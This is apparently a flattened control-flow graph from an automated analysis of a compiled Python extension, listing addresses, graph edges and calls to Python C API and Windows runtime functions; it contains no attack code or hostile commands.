7ffbaaf24313 12101->12103 12104 7ffbaaf2430a _Py_Dealloc 12101->12104 12102->12101 12105 7ffbaaf2432c 12103->12105 12106 7ffbaaf24323 _Py_Dealloc 12103->12106 12104->12103 12107 7ffbaaf24345 12105->12107 12108 7ffbaaf2433c _Py_Dealloc 12105->12108 12106->12105 12109 7ffbaaf2435e 12107->12109 12110 7ffbaaf24355 _Py_Dealloc 12107->12110 12108->12107 12111 7ffbaaf24377 12109->12111 12112 7ffbaaf2436e _Py_Dealloc 12109->12112 12110->12109 12113 7ffbaaf24390 12111->12113 12114 7ffbaaf24387 _Py_Dealloc 12111->12114 12112->12111 12115 7ffbaaf243a9 12113->12115 12117 7ffbaaf243a0 _Py_Dealloc 12113->12117 12114->12113 12116 7ffbaaf243c5 12115->12116 12118 7ffbaaf243bc _Py_Dealloc 12115->12118 12119 7ffbaaf243e1 12116->12119 12120 7ffbaaf243d8 _Py_Dealloc 12116->12120 12117->12115 12118->12116 12121 7ffbaaf243fd 12119->12121 12122 7ffbaaf243f4 _Py_Dealloc 12119->12122 12120->12119 12123 7ffbaaf24419 12121->12123 12124 7ffbaaf24410 _Py_Dealloc 12121->12124 12122->12121 12125 7ffbaaf24435 12123->12125 12127 7ffbaaf2442c _Py_Dealloc 12123->12127 12124->12123 12126 7ffbaaf24451 12125->12126 12128 7ffbaaf24448 _Py_Dealloc 12125->12128 12129 7ffbaaf2446d 12126->12129 12130 7ffbaaf24464 _Py_Dealloc 12126->12130 12127->12125 12128->12126 12131 7ffbaaf24489 12129->12131 12132 7ffbaaf24480 _Py_Dealloc 12129->12132 12130->12129 12133 7ffbaaf244a5 12131->12133 12134 7ffbaaf2449c _Py_Dealloc 12131->12134 12132->12131 12135 7ffbaaf244c1 12133->12135 12136 7ffbaaf244b8 _Py_Dealloc 12133->12136 12134->12133 12137 7ffbaaf244dd 12135->12137 12138 7ffbaaf244d4 _Py_Dealloc 12135->12138 12136->12135 12139 7ffbaaf244f9 12137->12139 12140 7ffbaaf244f0 _Py_Dealloc 12137->12140 12138->12137 12141 7ffbaaf24515 12139->12141 12142 7ffbaaf2450c _Py_Dealloc 12139->12142 12140->12139 12143 7ffbaaf24531 12141->12143 12144 7ffbaaf24528 _Py_Dealloc 12141->12144 12142->12141 12145 7ffbaaf2454d 12143->12145 12146 7ffbaaf24544 _Py_Dealloc 12143->12146 12144->12143 12147 7ffbaaf24569 12145->12147 12149 7ffbaaf24560 _Py_Dealloc 12145->12149 12146->12145 12148 7ffbaaf24585 12147->12148 12150 7ffbaaf2457c _Py_Dealloc 12147->12150 12151 7ffbaaf245a1 12148->12151 12152 7ffbaaf24598 _Py_Dealloc 12148->12152 12149->12147 12150->12148 12153 7ffbaaf245bd 12151->12153 12154 7ffbaaf245b4 _Py_Dealloc 12151->12154 12152->12151 12155 7ffbaaf245d9 12153->12155 12156 7ffbaaf245d0 _Py_Dealloc 12153->12156 12154->12153 12157 7ffbaaf245f5 12155->12157 12159 7ffbaaf245ec _Py_Dealloc 12155->12159 12156->12155 12158 7ffbaaf24611 12157->12158 12160 7ffbaaf24608 _Py_Dealloc 12157->12160 12161 7ffbaaf2462d 12158->12161 12162 7ffbaaf24624 _Py_Dealloc 12158->12162 12159->12157 12160->12158 12163 7ffbaaf24649 12161->12163 12164 7ffbaaf24640 _Py_Dealloc 12161->12164 12162->12161 12165 7ffbaaf24665 12163->12165 12166 7ffbaaf2465c _Py_Dealloc 12163->12166 12164->12163 12167 7ffbaaf24681 12165->12167 12168 7ffbaaf24678 _Py_Dealloc 12165->12168 12166->12165 12169 7ffbaaf2469d 12167->12169 12170 7ffbaaf24694 _Py_Dealloc 12167->12170 12168->12167 12171 7ffbaaf246b9 12169->12171 12172 7ffbaaf246b0 _Py_Dealloc 12169->12172 12170->12169 12173 7ffbaaf246d5 12171->12173 12174 7ffbaaf246cc _Py_Dealloc 12171->12174 12172->12171 12175 7ffbaaf246f1 12173->12175 12176 7ffbaaf246e8 _Py_Dealloc 12173->12176 12174->12173 12177 7ffbaaf2470d 12175->12177 12178 7ffbaaf24704 _Py_Dealloc 12175->12178 12176->12175 12179 7ffbaaf24729 12177->12179 12181 7ffbaaf24720 _Py_Dealloc 12177->12181 12178->12177 12180 7ffbaaf24745 12179->12180 12182 7ffbaaf2473c _Py_Dealloc 12179->12182 12183 7ffbaaf24761 12180->12183 12184 7ffbaaf24758 _Py_Dealloc 12180->12184 12181->12179 12182->12180 12185 7ffbaaf2477d 12183->12185 12186 7ffbaaf24774 _Py_Dealloc 12183->12186 12184->12183 12187 7ffbaaf24799 12185->12187 12188 7ffbaaf24790 _Py_Dealloc 12185->12188 12186->12185 12189 7ffbaaf247b5 12187->12189 12191 7ffbaaf247ac _Py_Dealloc 12187->12191 12188->12187 12190 7ffbaaf247d1 12189->12190 12192 7ffbaaf247c8 _Py_Dealloc 12189->12192 12193 7ffbaaf247ed 12190->12193 12194 7ffbaaf247e4 _Py_Dealloc 12190->12194 12191->12189 12192->12190 12195 7ffbaaf24809 12193->12195 12196 7ffbaaf24800 _Py_Dealloc 12193->12196 12194->12193 12197 7ffbaaf24825 12195->12197 12198 7ffbaaf2481c _Py_Dealloc 12195->12198 12196->12195 12199 7ffbaaf24841 12197->12199 12200 7ffbaaf24838 _Py_Dealloc 12197->12200 12198->12197 12201 7ffbaaf2485d 12199->12201 12202 7ffbaaf24854 _Py_Dealloc 12199->12202 12200->12199 12203 7ffbaaf24879 12201->12203 12204 7ffbaaf24870 _Py_Dealloc 12201->12204 12202->12201 12205 7ffbaaf24895 12203->12205 12206 7ffbaaf2488c _Py_Dealloc 12203->12206 12204->12203 12207 7ffbaaf248b1 12205->12207 12208 7ffbaaf248a8 _Py_Dealloc 12205->12208 12206->12205 12209 7ffbaaf248cd 12207->12209 12210 7ffbaaf248c4 _Py_Dealloc 12207->12210 12208->12207 12211 7ffbaaf248e9 12209->12211 12213 7ffbaaf248e0 _Py_Dealloc 12209->12213 12210->12209 12212 7ffbaaf24905 12211->12212 12214 7ffbaaf248fc _Py_Dealloc 12211->12214 12215 7ffbaaf24921 12212->12215 12216 7ffbaaf24918 _Py_Dealloc 12212->12216 12213->12211 12214->12212 12217 7ffbaaf2493d 12215->12217 12218 7ffbaaf24934 _Py_Dealloc 12215->12218 12216->12215 12219 7ffbaaf24959 12217->12219 12220 7ffbaaf24950 _Py_Dealloc 12217->12220 12218->12217 12221 7ffbaaf24975 12219->12221 12223 7ffbaaf2496c _Py_Dealloc 12219->12223 12220->12219 12222 7ffbaaf24991 12221->12222 12224 7ffbaaf24988 _Py_Dealloc 12221->12224 12225 7ffbaaf249ad 12222->12225 12226 7ffbaaf249a4 _Py_Dealloc 12222->12226 12223->12221 12224->12222 12227 7ffbaaf249c9 12225->12227 12228 7ffbaaf249c0 _Py_Dealloc 12225->12228 12226->12225 12229 7ffbaaf249e5 12227->12229 12230 7ffbaaf249dc _Py_Dealloc 12227->12230 12228->12227 12231 7ffbaaf24a01 12229->12231 12232 7ffbaaf249f8 _Py_Dealloc 12229->12232 12230->12229 12233 7ffbaaf24a1d 12231->12233 12234 7ffbaaf24a14 _Py_Dealloc 12231->12234 12232->12231 12235 7ffbaaf24a39 12233->12235 12236 7ffbaaf24a30 _Py_Dealloc 12233->12236 12234->12233 12237 7ffbaaf24a55 12235->12237 12238 7ffbaaf24a4c _Py_Dealloc 12235->12238 12236->12235 12239 7ffbaaf258cb _Py_Dealloc 12237->12239 12240 7ffbaaf1f2e9 12237->12240 12238->12237 12239->12240 12241 7ffbaaf25953 12240->12241 12242 7ffbaaf1f348 _Py_Dealloc 12240->12242 12242->12241 12243 7ffbaaf1f42f _Py_Dealloc 12244 7ffbaaf1f44e 12243->12244 12245 7ffbaaf2423e _Py_Dealloc 12244->12245 12246 7ffbaaf24247 12244->12246 12245->12246 12247 7ffbaaf2425c 12246->12247 12248 7ffbaaf24253 _Py_Dealloc 12246->12248 12249 7ffbaaf24271 12247->12249 12250 7ffbaaf24268 _Py_Dealloc 12247->12250 12248->12247 12251 7ffbaaf2428d 12249->12251 12253 7ffbaaf24284 _Py_Dealloc 12249->12253 12250->12249 12252 7ffbaaf242a9 12251->12252 12254 7ffbaaf242a0 _Py_Dealloc 12251->12254 12255 7ffbaaf242c5 12252->12255 12256 7ffbaaf242bc _Py_Dealloc 12252->12256 12253->12251 12254->12252 12257 7ffbaaf242e1 12255->12257 12258 7ffbaaf242d8 _Py_Dealloc 12255->12258 12256->12255 12259 7ffbaaf242fa 12257->12259 12260 7ffbaaf242f1 _Py_Dealloc 12257->12260 12258->12257 12261 7ffbaaf24313 12259->12261 12262 7ffbaaf2430a _Py_Dealloc 12259->12262 12260->12259 12263 7ffbaaf2432c 12261->12263 12264 7ffbaaf24323 _Py_Dealloc 12261->12264 12262->12261 12265 7ffbaaf24345 12263->12265 12266 7ffbaaf2433c _Py_Dealloc 12263->12266 12264->12263 12267 7ffbaaf2435e 12265->12267 12268 7ffbaaf24355 _Py_Dealloc 12265->12268 12266->12265 12269 7ffbaaf24377 12267->12269 12270 7ffbaaf2436e _Py_Dealloc 12267->12270 12268->12267 12271 7ffbaaf24390 12269->12271 12272 7ffbaaf24387 _Py_Dealloc 12269->12272 12270->12269 12273 7ffbaaf243a9 12271->12273 12275 7ffbaaf243a0 _Py_Dealloc 12271->12275 12272->12271 12274 7ffbaaf243c5 12273->12274 12276 7ffbaaf243bc _Py_Dealloc 12273->12276 12277 7ffbaaf243e1 12274->12277 12278 7ffbaaf243d8 _Py_Dealloc 12274->12278 12275->12273 12276->12274 12279 7ffbaaf243fd 12277->12279 12280 7ffbaaf243f4 _Py_Dealloc 12277->12280 12278->12277 12281 7ffbaaf24419 12279->12281 12282 7ffbaaf24410 _Py_Dealloc 12279->12282 12280->12279 12283 7ffbaaf24435 12281->12283 12285 7ffbaaf2442c _Py_Dealloc 12281->12285 12282->12281 12284 7ffbaaf24451 12283->12284 12286 7ffbaaf24448 _Py_Dealloc 12283->12286 12287 7ffbaaf2446d 12284->12287 12288 7ffbaaf24464 _Py_Dealloc 12284->12288 12285->12283 12286->12284 12289 7ffbaaf24489 12287->12289 12290 7ffbaaf24480 _Py_Dealloc 12287->12290 12288->12287 12291 7ffbaaf244a5 12289->12291 12292 7ffbaaf2449c _Py_Dealloc 12289->12292 12290->12289 12293 7ffbaaf244c1 12291->12293 12294 7ffbaaf244b8 _Py_Dealloc 12291->12294 12292->12291 12295 7ffbaaf244dd 12293->12295 12296 7ffbaaf244d4 _Py_Dealloc 12293->12296 12294->12293 12297 7ffbaaf244f9 12295->12297 12298 7ffbaaf244f0 _Py_Dealloc 12295->12298 12296->12295 12299 7ffbaaf24515 12297->12299 12300 7ffbaaf2450c _Py_Dealloc 12297->12300 12298->12297 12301 7ffbaaf24531 12299->12301 12302 7ffbaaf24528 _Py_Dealloc 12299->12302 12300->12299 12303 7ffbaaf2454d 12301->12303 12304 7ffbaaf24544 _Py_Dealloc 12301->12304 12302->12301 12305 7ffbaaf24569 12303->12305 12307 7ffbaaf24560 _Py_Dealloc 12303->12307 12304->12303 12306 7ffbaaf24585 12305->12306 12308 7ffbaaf2457c _Py_Dealloc 12305->12308 12309 7ffbaaf245a1 12306->12309 12310 7ffbaaf24598 _Py_Dealloc 12306->12310 12307->12305 12308->12306 12311 7ffbaaf245bd 12309->12311 12312 7ffbaaf245b4 _Py_Dealloc 12309->12312 12310->12309 12313 7ffbaaf245d9 12311->12313 12314 7ffbaaf245d0 _Py_Dealloc 12311->12314 12312->12311 12315 7ffbaaf245f5 12313->12315 12317 7ffbaaf245ec _Py_Dealloc 12313->12317 12314->12313 12316 7ffbaaf24611 12315->12316 12318 7ffbaaf24608 _Py_Dealloc 12315->12318 12319 7ffbaaf2462d 12316->12319 12320 7ffbaaf24624 _Py_Dealloc 12316->12320 12317->12315 12318->12316 12321 7ffbaaf24649 12319->12321 12322 7ffbaaf24640 _Py_Dealloc 12319->12322 12320->12319 12323 7ffbaaf24665 12321->12323 12324 7ffbaaf2465c _Py_Dealloc 12321->12324 12322->12321 12325 7ffbaaf24681 12323->12325 12326 7ffbaaf24678 _Py_Dealloc 12323->12326 12324->12323 12327 7ffbaaf2469d 12325->12327 12328 7ffbaaf24694 _Py_Dealloc 12325->12328 12326->12325 12329 7ffbaaf246b9 12327->12329 12330 7ffbaaf246b0 _Py_Dealloc 12327->12330 12328->12327 12331 7ffbaaf246d5 12329->12331 12332 7ffbaaf246cc _Py_Dealloc 12329->12332 12330->12329 12333 7ffbaaf246f1 12331->12333 12334 7ffbaaf246e8 _Py_Dealloc 12331->12334 12332->12331 12335 7ffbaaf2470d 12333->12335 12336 7ffbaaf24704 _Py_Dealloc 12333->12336 12334->12333 12337 7ffbaaf24729 12335->12337 12339 7ffbaaf24720 _Py_Dealloc 12335->12339 12336->12335 12338 7ffbaaf24745 12337->12338 12340 7ffbaaf2473c _Py_Dealloc 12337->12340 12341 7ffbaaf24761 12338->12341 12342 7ffbaaf24758 _Py_Dealloc 12338->12342 12339->12337 12340->12338 12343 7ffbaaf2477d 12341->12343 12344 7ffbaaf24774 _Py_Dealloc 12341->12344 12342->12341 12345 7ffbaaf24799 12343->12345 12346 7ffbaaf24790 _Py_Dealloc 12343->12346 12344->12343 12347 7ffbaaf247b5 12345->12347 12349 7ffbaaf247ac _Py_Dealloc 12345->12349 12346->12345 12348 7ffbaaf247d1 12347->12348 12350 7ffbaaf247c8 _Py_Dealloc 12347->12350 12351 7ffbaaf247ed 12348->12351 12352 7ffbaaf247e4 _Py_Dealloc 12348->12352 12349->12347 12350->12348 12353 7ffbaaf24809 12351->12353 12354 7ffbaaf24800 _Py_Dealloc 12351->12354 12352->12351 12355 7ffbaaf24825 12353->12355 12356 7ffbaaf2481c _Py_Dealloc 12353->12356 12354->12353 12357 7ffbaaf24841 12355->12357 12358 7ffbaaf24838 _Py_Dealloc 12355->12358 12356->12355 12359 7ffbaaf2485d 12357->12359 12360 7ffbaaf24854 _Py_Dealloc 12357->12360 12358->12357 12361 7ffbaaf24879 12359->12361 12362 7ffbaaf24870 _Py_Dealloc 12359->12362 12360->12359 12363 7ffbaaf24895 12361->12363 12364 7ffbaaf2488c _Py_Dealloc 12361->12364 12362->12361 12365 7ffbaaf248b1 12363->12365 12366 7ffbaaf248a8 _Py_Dealloc 12363->12366 12364->12363 12367 7ffbaaf248cd 12365->12367 12368 7ffbaaf248c4 _Py_Dealloc 12365->12368 12366->12365 12369 7ffbaaf248e9 12367->12369 12371 7ffbaaf248e0 _Py_Dealloc 12367->12371 12368->12367 12370 7ffbaaf24905 12369->12370 12372 7ffbaaf248fc _Py_Dealloc 12369->12372 12373 7ffbaaf24921 12370->12373 12374 7ffbaaf24918 _Py_Dealloc 12370->12374 12371->12369 12372->12370 12375 7ffbaaf2493d 12373->12375 12376 7ffbaaf24934 _Py_Dealloc 12373->12376 12374->12373 12377 7ffbaaf24959 12375->12377 12378 7ffbaaf24950 _Py_Dealloc 12375->12378 12376->12375 12379 7ffbaaf24975 12377->12379 12381 7ffbaaf2496c _Py_Dealloc 12377->12381 12378->12377 12380 7ffbaaf24991 12379->12380 12382 7ffbaaf24988 _Py_Dealloc 12379->12382 12383 7ffbaaf249ad 12380->12383 12384 7ffbaaf249a4 _Py_Dealloc 12380->12384 12381->12379 12382->12380 12385 7ffbaaf249c0 _Py_Dealloc 12383->12385 12386 7ffbaaf249c9 12383->12386 12384->12383 12385->12386 12387 7ffbaaf249e5 12386->12387 12388 7ffbaaf249dc _Py_Dealloc 12386->12388 12389 7ffbaaf24a01 12387->12389 12390 7ffbaaf249f8 _Py_Dealloc 12387->12390 12388->12387 12391 7ffbaaf24a1d 12389->12391 12392 7ffbaaf24a14 _Py_Dealloc 12389->12392 12390->12389 12393 7ffbaaf24a39 12391->12393 12394 7ffbaaf24a30 _Py_Dealloc 12391->12394 12392->12391 12395 7ffbaaf24a55 12393->12395 12396 7ffbaaf24a4c _Py_Dealloc 12393->12396 12394->12393 12397 7ffbaaf258cb _Py_Dealloc 12395->12397 12398 7ffbaaf1f2e9 12395->12398 12396->12395 12397->12398 12399 7ffbaaf25953 12398->12399 12400 7ffbaaf1f348 _Py_Dealloc 12398->12400 12400->12399 12401 7ffbaa7fb5b4 12402 7ffbaa7fb5d5 12401->12402 12403 7ffbaa7fb5d0 12401->12403 12405 7ffbaa7fbc74 12403->12405 12406 7ffbaa7fbc97 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12405->12406 12407 7ffbaa7fbd0b 12405->12407 12406->12407 12407->12402 9358 7ffbaaf26fc0 9359 7ffbaaf26fe0 Py_EnterRecursiveCall 9358->9359 9361 7ffbaaf2700b Py_LeaveRecursiveCall 9359->9361 9362 7ffbaaf26ff9 9359->9362 9364 7ffbaaf27021 PyErr_Occurred 9361->9364 9365 7ffbaaf27043 9361->9365 9364->9365 9366 7ffbaaf2702c PyErr_SetString 9364->9366 9366->9365 9367 7ffbaaf0afc0 9368 7ffbaaf0afce PyErr_Format 9367->9368 9369 7ffbaaf0b00d 9367->9369 9368->9369 9370 7ffbaaf0b037 PyLong_FromLong 9369->9370 9414 7ffbaaf26bb0 9369->9414 9371 7ffbaaf0b0a9 PyTuple_New 9370->9371 9412 7ffbaaf0b092 9370->9412 9372 7ffbaaf0b0bc 9371->9372 9376 7ffbaaf0b0cc 9371->9376 9374 7ffbaaf0b3dc _Py_Dealloc 9372->9374 9375 7ffbaaf0b1dc 9372->9375 9374->9375 9381 7ffbaaf0b577 _Py_Dealloc 9375->9381 9406 7ffbaaf0b508 9375->9406 9378 7ffbaaf0b196 PyTuple_New 9376->9378 9396 7ffbaaf0b20f 9376->9396 9376->9412 9377 7ffbaaf0b5cc 9379 7ffbaaf0b5ff 9377->9379 9384 7ffbaaf0b5f6 _Py_Dealloc 9377->9384 9380 7ffbaaf0b1c0 PyNumber_InPlaceAdd 9378->9380 9378->9412 9380->9375 9385 7ffbaaf0b1ec 9380->9385 9381->9406 9382 7ffbaaf0b58b _Py_Dealloc 9382->9412 9383 7ffbaaf0b5c3 _Py_Dealloc 9383->9377 9384->9379 9388 7ffbaaf0b1fb 9385->9388 9389 7ffbaaf0b1f2 _Py_Dealloc 9385->9389 9386 7ffbaaf0b266 9392 7ffbaaf0b27d 9386->9392 9393 7ffbaaf0b2de _PyDict_GetItem_KnownHash 9386->9393 9387 7ffbaaf0b407 9390 7ffbaaf0b41e 9387->9390 9391 7ffbaaf0b47f _PyDict_GetItem_KnownHash 9387->9391 9388->9386 9394 7ffbaaf0b207 _Py_Dealloc 9388->9394 9389->9388 9398 7ffbaaf25c40 7 API calls 9390->9398 9404 7ffbaaf0b42a 9390->9404 9397 7ffbaaf0b4bf PyErr_Occurred 9391->9397 9391->9404 9399 7ffbaaf25c40 7 API calls 9392->9399 9407 7ffbaaf0b289 9392->9407 9395 7ffbaaf0b31f PyErr_Occurred 9393->9395 9393->9407 9394->9386 9395->9407 9396->9386 9396->9387 9397->9404 9402 7ffbaaf0b44c 9398->9402 9403 7ffbaaf0b2ab 9399->9403 9400 7ffbaaf0b4f5 PyTuple_New 9405 7ffbaaf0b51c PyTuple_New 9400->9405 9400->9406 9401 7ffbaaf0b355 PyTuple_New 9401->9372 9409 7ffbaaf0b370 PyTuple_New 9401->9409 9402->9404 9408 7ffbaaf0b458 PyErr_Occurred 9402->9408 9403->9407 9410 7ffbaaf0b2b7 PyErr_Occurred 9403->9410 9404->9400 9404->9412 9405->9375 9405->9412 9406->9382 9406->9412 9407->9401 9407->9412 9408->9404 9411 7ffbaaf0b463 PyErr_Format 9408->9411 9409->9372 9409->9412 9410->9407 9413 7ffbaaf0b2c2 PyErr_Format 9410->9413 9411->9404 9412->9377 9412->9383 9413->9407 9415 7ffbaaf26be4 9414->9415 9416 7ffbaaf26c03 PyDict_Next 9414->9416 9417 7ffbaaf26cb5 9415->9417 9419 7ffbaaf26c5d PyErr_Format 9415->9419 9416->9415 9418 7ffbaaf26c1a 9416->9418 9417->9369 9420 7ffbaaf26c35 PyDict_Next 9418->9420 9421 7ffbaaf26c89 PyErr_Format 9418->9421 9419->9369 9420->9415 9420->9418 9421->9369 9589 7ffbaaf2b7c0 9590 7ffbaaf2b7cc 9589->9590 9591 7ffbaaf2b7ff PyErr_SetString 9589->9591 9590->9591 9592 7ffbaaf2b7dc 9590->9592 9593 7ffbaaf2b7f8 9592->9593 9594 7ffbaaf2b7f2 _Py_Dealloc 9592->9594 9594->9593 9755 7ffbaaf18fd0 9756 7ffbaaf18ff4 PyObject_Init PyObject_GC_Track 9755->9756 9757 7ffbaaf19038 9755->9757 9758 7ffbaaf1902f 9756->9758 9757->9758 9759 7ffbaaf190a3 PyObject_GC_UnTrack 9757->9759 9760 7ffbaaf19077 PyObject_GC_IsFinalized 9757->9760 9762 7ffbaaf190cc 9759->9762 9763 7ffbaaf190bc 9759->9763 9760->9759 9761 7ffbaaf19081 9760->9761 9761->9759 9764 7ffbaaf19092 PyObject_CallFinalizerFromDealloc 9761->9764 9766 7ffbaaf190df _Py_Dealloc 9762->9766 9767 7ffbaaf190e5 9762->9767 9763->9762 9765 7ffbaaf190c6 _Py_Dealloc 9763->9765 9764->9759 9769 7ffbaaf190fe 9764->9769 9765->9762 9766->9767 9768 7ffbaaf190f8 _Py_Dealloc 9767->9768 9767->9769 9768->9769 9770 7ffbaaf1e3d0 9772 7ffbaaf1e3eb 9770->9772 9771 7ffbaaf1e41f PyObject_SetAttr 9773 7ffbaaf1e43f 9771->9773 9779 7ffbaaf1e833 9771->9779 9772->9771 9772->9779 9774 7ffbaaf1e4a2 PyObject_SetAttr 9773->9774 9773->9779 9775 7ffbaaf1e4c2 9774->9775 9774->9779 9776 7ffbaaf1e6ea PyObject_SetAttr 9775->9776 9775->9779 9777 7ffbaaf1e711 9776->9777 9776->9779 9778 7ffbaaf1e80c PyObject_SetAttr 9777->9778 9777->9779 9778->9779 9940 7ffbaaf28bd0 9941 7ffbaaf28be2 PyDict_New 9940->9941 9942 7ffbaaf28bf1 9940->9942 9941->9942 10263 7ffbaaf157d7 10264 7ffbaaf157ee 10263->10264 10265 7ffbaaf1584f _PyDict_GetItem_KnownHash 10263->10265 10267 7ffbaaf25c40 7 API calls 10264->10267 10268 7ffbaaf157fa 10264->10268 10266 7ffbaaf1588f PyErr_Occurred 10265->10266 10265->10268 10266->10268 10270 7ffbaaf1581c 10267->10270 10269 7ffbaaf158c5 PyDict_New 10268->10269 10287 7ffbaaf158ae 10268->10287 10271 7ffbaaf158db PyDict_SetItem 10269->10271 10272 7ffbaaf158d3 10269->10272 10270->10268 10273 7ffbaaf15828 PyErr_Occurred 10270->10273 10271->10272 10274 7ffbaaf15901 10271->10274 10276 7ffbaaf1593b _Py_Dealloc 10272->10276 10277 7ffbaaf15cd6 10272->10277 10273->10268 10275 7ffbaaf15833 PyErr_Format 10273->10275 10274->10272 10280 7ffbaaf15949 10274->10280 10275->10268 10276->10277 10281 7ffbaaf15ce1 _Py_Dealloc 10277->10281 10277->10287 10278 7ffbaaf1597b 10279 7ffbaaf159bf 10278->10279 10283 7ffbaaf159b6 _Py_Dealloc 10278->10283 10284 7ffbaaf1594f _Py_Dealloc 10280->10284 10285 7ffbaaf15958 10280->10285 10281->10287 10282 7ffbaaf15972 _Py_Dealloc 10282->10278 10283->10279 10284->10285 10286 7ffbaaf1595e _Py_Dealloc 10285->10286 10285->10287 10286->10287 10287->10278 10287->10282 10928 7ffbaaf0bfe0 10929 7ffbaaf0c073 10928->10929 10931 7ffbaaf0c03c 10928->10931 10930 7ffbaaf0c5c4 10929->10930 10932 7ffbaaf0c5bb _Py_Dealloc 10929->10932 10933 7ffbaaf0c5e1 10930->10933 10934 7ffbaaf0c5d8 _Py_Dealloc 10930->10934 10931->10929 10939 7ffbaaf0c0cc PyBytes_AsStringAndSize 10931->10939 10932->10930 10935 7ffbaaf0c5fe 10933->10935 10936 7ffbaaf0c5f5 _Py_Dealloc 10933->10936 10934->10933 10937 7ffbaaf0c61f 10935->10937 10938 7ffbaaf0c616 _Py_Dealloc 10935->10938 10936->10935 10938->10937 10939->10929 10940 7ffbaaf0c0f7 10939->10940 10941 7ffbaaf0c1b5 10940->10941 10942 7ffbaaf0c118 10940->10942 10943 7ffbaaf0c1c5 PyErr_SetString 10941->10943 10949 7ffbaaf0c15f 10941->10949 10944 7ffbaaf0c14f 10942->10944 10945 7ffbaaf0c121 PyErr_Format 10942->10945 10943->10929 10946 7ffbaaf0c18f PyUnicode_Decode 10944->10946 10947 7ffbaaf0c180 PyUnicode_DecodeUTF8 10944->10947 10944->10949 10945->10929 10946->10949 10947->10949 10948 7ffbaaf0c242 10948->10929 10952 7ffbaaf0c2cf PyObject_GetAttr 10948->10952 10953 7ffbaaf0c2ca 10948->10953 10949->10929 10949->10948 10950 7ffbaaf0c272 PyUnicode_Decode 10949->10950 10951 7ffbaaf0c263 PyUnicode_DecodeUTF8 10949->10951 10950->10948 10951->10948 10952->10953 10953->10929 10954 7ffbaaf0c322 _Py_Dealloc 10953->10954 10956 7ffbaaf0c328 10953->10956 10954->10956 10955 7ffbaaf0c36d 10958 7ffbaaf0c372 10955->10958 10959 7ffbaaf0c3b8 10955->10959 10956->10955 10957 7ffbaaf0c364 _Py_Dealloc 10956->10957 10957->10955 10958->10929 10964 7ffbaaf0c391 _Py_Dealloc 10958->10964 10960 7ffbaaf0c3be _Py_Dealloc 10959->10960 10961 7ffbaaf0c3c7 10959->10961 10960->10961 10962 7ffbaaf0c3ce _Py_Dealloc 10961->10962 10963 7ffbaaf0c3d7 10961->10963 10962->10963 10965 7ffbaaf0c450 PyByteArray_Resize 10963->10965 10966 7ffbaaf0c433 10963->10966 10969 7ffbaaf0c3fb PyErr_Format 10963->10969 10964->10929 10967 7ffbaaf0c476 10965->10967 10968 7ffbaaf0c467 10965->10968 10970 7ffbaaf0c443 _Py_Dealloc 10966->10970 10971 7ffbaaf0c449 10966->10971 10972 7ffbaaf0c47c _Py_Dealloc 10967->10972 10973 7ffbaaf0c485 PyByteArray_Resize 10967->10973 10968->10929 10974 7ffbaaf0c569 _Py_Dealloc 10968->10974 10969->10929 10970->10971 10971->10965 10972->10973 10973->10968 10975 7ffbaaf0c4ab 10973->10975 10974->10929 10976 7ffbaaf0c4b1 _Py_Dealloc 10975->10976 10977 7ffbaaf0c4ba 10975->10977 10976->10977 10978 7ffbaaf0c4ce PyErr_Format 10977->10978 10979 7ffbaaf0c502 PyTuple_New 10977->10979 10978->10929 10979->10929 10980 7ffbaaf0c52b 10979->10980 10980->10968 10981 7ffbaaf0c577 10980->10981 10981->10929 10982 7ffbaaf0c57d _Py_Dealloc 10981->10982 10982->10929 10983 7ffbaaf16fe0 PyLong_FromLong 10984 7ffbaaf17029 PySequence_Contains 10983->10984 10989 7ffbaaf17019 10983->10989 10985 7ffbaaf17053 10984->10985 10986 7ffbaaf17046 10984->10986 10987 7ffbaaf17062 10985->10987 10988 7ffbaaf17059 _Py_Dealloc 10985->10988 10986->10989 10992 7ffbaaf170e2 _Py_Dealloc 10986->10992 10990 7ffbaaf171ea 10987->10990 10991 7ffbaaf1706a PyList_New 10987->10991 10988->10987 10995 7ffbaaf17380 10989->10995 10996 7ffbaaf17377 _Py_Dealloc 10989->10996 10993 7ffbaaf17211 PyObject_GetAttr 10990->10993 10998 7ffbaaf1720c 10990->10998 10991->10989 10994 7ffbaaf1708d 10991->10994 10992->10989 10993->10998 10994->10986 10999 7ffbaaf170f0 10994->10999 10997 7ffbaaf17385 10995->10997 11000 7ffbaaf173a2 _Py_Dealloc 10995->11000 10996->10995 10998->10989 11002 7ffbaaf1725e _Py_Dealloc 10998->11002 11004 7ffbaaf17264 10998->11004 11001 7ffbaaf170f6 _Py_Dealloc 10999->11001 11006 7ffbaaf170ff 10999->11006 11000->10997 11001->11006 11002->11004 11003 7ffbaaf172a9 11005 7ffbaaf1711d 11003->11005 11008 7ffbaaf172de 11003->11008 11004->11003 11007 7ffbaaf172a0 _Py_Dealloc 11004->11007 11005->10989 11013 7ffbaaf172d3 _Py_Dealloc 11005->11013 11006->11005 11009 7ffbaaf17142 _Py_Dealloc 11006->11009 11010 7ffbaaf17148 11006->11010 11007->11003 11011 7ffbaaf172ed 11008->11011 11012 7ffbaaf172e4 _Py_Dealloc 11008->11012 11009->11010 11014 7ffbaaf1714e _Py_Dealloc 11010->11014 11015 7ffbaaf17157 PyLong_FromLong 11010->11015 11011->10995 11017 7ffbaaf17334 11011->11017 11018 7ffbaaf1730a PyErr_Format 11011->11018 11012->11011 11013->10989 11014->11015 11015->10989 11016 7ffbaaf17178 PyUnicode_Format 11015->11016 11016->11005 11019 7ffbaaf171ae 11016->11019 11027 7ffbaaf173d0 11017->11027 11018->10989 11021 7ffbaaf171bd 11019->11021 11022 7ffbaaf171b4 _Py_Dealloc 11019->11022 11021->10989 11026 7ffbaaf171d1 _Py_Dealloc 11021->11026 11022->11021 11023 7ffbaaf1733f 11023->10989 11024 7ffbaaf17387 11023->11024 11024->10995 11025 7ffbaaf1738d _Py_Dealloc 11024->11025 11025->10995 11026->10989 11028 7ffbaaf173f1 PyErr_SetString 11027->11028 11029 7ffbaaf1741e 11027->11029 11030 7ffbaaf17433 11028->11030 11029->11030 11031 7ffbaaf17453 _Py_Dealloc 11029->11031 11032 7ffbaaf17459 11029->11032 11030->11023 11031->11032 11033 7ffbaaf17466 PyErr_SetString 11032->11033 11034 7ffbaaf17493 11032->11034 11033->11030 11034->11030 11035 7ffbaaf174d0 PyErr_Occurred 11034->11035 11036 7ffbaaf174f1 11034->11036 11035->11036 11075 7ffbaaf174db 11035->11075 11037 7ffbaaf17501 11036->11037 11038 7ffbaaf174f8 _Py_Dealloc 